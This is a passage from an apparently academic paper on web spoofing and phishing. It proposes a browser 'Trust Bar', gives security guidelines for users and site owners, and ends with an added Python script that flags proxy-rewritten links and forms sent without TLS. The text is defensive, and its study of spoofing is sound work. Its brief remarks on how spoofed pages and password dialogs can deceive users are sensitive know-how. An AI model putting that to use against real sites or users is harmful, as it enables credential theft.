Since spoofing each aspect of behavior of each common platform takes a lot of work, we do not believe that convincing long-lived shadow Web attacks are likely. However, short-lived sessions with narrow user behavior are much more susceptible. In theory, we could have connected our spoofed page to the real WebBlitz service, put out some misleading links, and monitored our friends' email.

The emergence of common user interface technologies is also leading to a continued blurring of the boundaries between what servers and browsers tell users, and between internal and external data paths. For example, Netscape's Personal Security Manager has been touted as the solution to client security management. However, the sequence of windows that pop up to collect the user's password that protects these client keys are all easily spoofable, enabling remote malicious servers to learn these passwords. Further exploration here would be interesting.

Another interesting area would be to explore the potential of using spoofing for users of Web-like OS interfaces. We are also examining the de facto semantics that current browsers offer for certificate handling for various devious but legal sessions.

12. CONCLUSION
In the developer community, currently web users, and in particular naive users, are vulnerable to different web spoofing attacks; elsewhere, phishing and spoofing attacks are in fact increasingly common. In this paper, we describe browser and protocol extensions that we are designing and implementing, that will help prevent web spoofing (and phishing) attacks. The main idea is to enhance browsers with a mandatory Trust Bar, with a fixed location at the top of every web page. The most important credential is probably the logo of the organization, used to provide and re-enforce the brand; and, when some trusted authority certifies the logo or other credentials of the site, the logo of that trusted authority (e.g. certificate authority). Our hope is that browser developers will incorporate the Trust Bar as soon as possible, i.e. make Trust Bar-enabled browsers. We hope to soon make available the source code of our implementation of the Trust Bar (for the Mozilla browser), and we will be happy to cooperate with others on creating high-quality open source code.

To conclude this paper, we present conclusions and recommendations for users and owners of sensitive web sites, such as e-commerce sites, for the period until browsers are Trust Bar-enabled; see additional recommendations in [TTV04]. We also note that even when using Trust Bar-enabled browsers, viruses and other malicious software may still be able to create unauthorized transactions, due to operating system vulnerabilities. We recommend that highly sensitive web sites such as e-brokerage consider authorizing transactions using more secure hardware modules (see below).

Conclusions for Users of Sensitive Web-sites
The focus of this paper was on ensuring security even for naive web users; however, even expert, cautious users cannot be absolutely protected, unless browsers are extended with security measures as we propose or as proposed by [LY03, YS02, YS03]. However, cautious users can increase their security, even before the site incorporates enhanced security measures, by following the following guidelines:

1. Use a Trust Bar-enhanced browser, using its `opportunistic logo identification` mechanism to establish logos for each of your sensitive web-pages. The authors developed and use a simple Trust Bar extension to the Mozilla browser, and plan to make it available for download from their homepages soon (after some final touches).
2. Always contact sensitive web sites by typing their address in the location bar, using a bookmark or following a link from a secure site, preferably protected by SSL/TLS.
3. Never click on links from e-mail messages or from other non-trustworthy sources (such as shady or possibly insecure web sites). These could lead you to a `URL-forwarding` man-in-the-middle attack, which may be hard or impossible to detect, even if you follow guideline 1 above.
4. Be very careful to inspect the location bar and the SSL icon upon entering sensitive web pages. Preferably, set up your browser to display the details of the certificate upon entering your most sensitive sites (most browsers can do this); this will help you notice the use of SSL and avoid most attacks. Do not trust indications of security and of the use of SSL when they appear as part of the web page, even when this page belongs to trustworthy organizations; see the examples of insecure login pages in Figure 5, by respectable financial institutions and e-commerce sites.

5. If possible, restrict the damages due to spoofing by instructing your financial services to limit online transactions in your account to cover only what you really need. Furthermore, consider using sensitive online services that use additional protection mechanisms beyond SSL.

Conclusions for Owners of Sensitive Web-sites
Owners of sensitive web-sites are often financial institutions, with substantial interest in security and ability to influence their consumers and often even software developers. We believe that such entities should seriously consider one of the following solutions:

1. Provide your customers with a browser with security enhancements as described here, and encourage them to install and use it. We notice that the basic `Trust Bar` enhancement, available in our site as of August 2004 for Mozilla, may suffice for most sites and customers. Many software integrators can perform such enhancements to Mozilla and other browsers easily, possibly taking advantage of the source code of our implementation.
2. Use means of authenticating transactions that are not vulnerable to web spoofing. In particular, `challenge-response` and similar one-time user authentication solutions can be effective against offline spoofing attacks (but may still fail against a determined attacker who is spoofing your web site actively in a `man in the middle` attack). Using SSL client authentication can be even more effective, and avoids the hardware token (but may be more complex and less convenient to the user).
3. Protect, using SSL/TLS, as many of your web pages as is feasible. In particular, be sure that every web form, i.e. every web page requesting the user to enter (sensitive) information, is properly protected when it is sent to the user. Notice that many respectable companies (probably using respectable web-site designers) were not careful enough and have insecure web pages asking users to enter sensitive information, as shown in Figure 5; this is insecure (the site may invoke SSL to protect the information, but the user cannot know this is not a spoofing site, i.e. this practice allows a spoofing site to collect passwords).
4. Use cookies to personalize the main web page of each customer, e.g. include a personal greeting by name and/or by a personalized mark/picture (e.g. see [PM04]). Also, warn users against using the page if the personal greeting is absent. This will foil many of the phishing attacks, which will be unable to present personalized pages.

We also recommend that site owners are careful to educate consumers on secure web and e-mail usage guidelines, including those mentioned above, as well as educate them on the structure of domain names and how to identify their corporate domains. This may include restricting corporate domains to only those that end with a clear corporate identity.
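As an added example, not code from the original report or from the Felten et al. or Trust Bar projects, the following Python script performs two of the checks described above: the "look for rewritten URLs in the HTML source" check of section 8.3, and owner guideline 3's requirement that every form be protected by TLS. It assumes the spoofing server rewrites URLs by prefixing its own host (so a rewritten link carries a second absolute URL inside its path); the host names and the sample page are constructed.

```python
# Added example, not code from the original report: a static audit of an HTML
# page for two spoofing indicators, assuming (as in the Felten et al. attack)
# that the spoofing server rewrites every URL by prefixing its own host.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a bank page as it might arrive through a spoofing proxy.
SAMPLE_HTML = """<a href="http://proxy.example/http://www.bank.example/accounts">Accounts</a>
<a href="/help">Help</a>
<form action="http://www.bank.example/login"><input name="pw"></form>
<form action="https://www.bank.example/login"><input name="pw"></form>"""


class RefCollector(HTMLParser):
    """Collect <a href> and <form action> targets from a document."""
    def __init__(self):
        super().__init__()
        self.hrefs, self.actions = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.hrefs.append(a["href"])
        elif tag == "form":
            self.actions.append(a.get("action") or "")


def collect(html):
    parser = RefCollector()
    parser.feed(html)
    return parser


def funneled_links(html):
    """hrefs whose path embeds a second absolute URL: the mark of prefix rewriting."""
    hits = []
    for href in collect(html).hrefs:
        inner = urlsplit(href).path.lstrip("/")
        if inner.startswith(("http://", "https://")) and urlsplit(inner).netloc:
            hits.append(href)
    return hits


def insecure_forms(html, page_url):
    """Form targets that would carry user input without TLS on the page or the post."""
    bad = []
    for action in collect(html).actions:
        target = urljoin(page_url, action)
        if urlsplit(page_url).scheme != "https" or urlsplit(target).scheme != "https":
            bad.append(target)
    return bad
```

Run against a page fetched directly (not through the browser) and compare the funneled-link list with what the location line shows; any hit means the page you are viewing is not the one the server sent.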



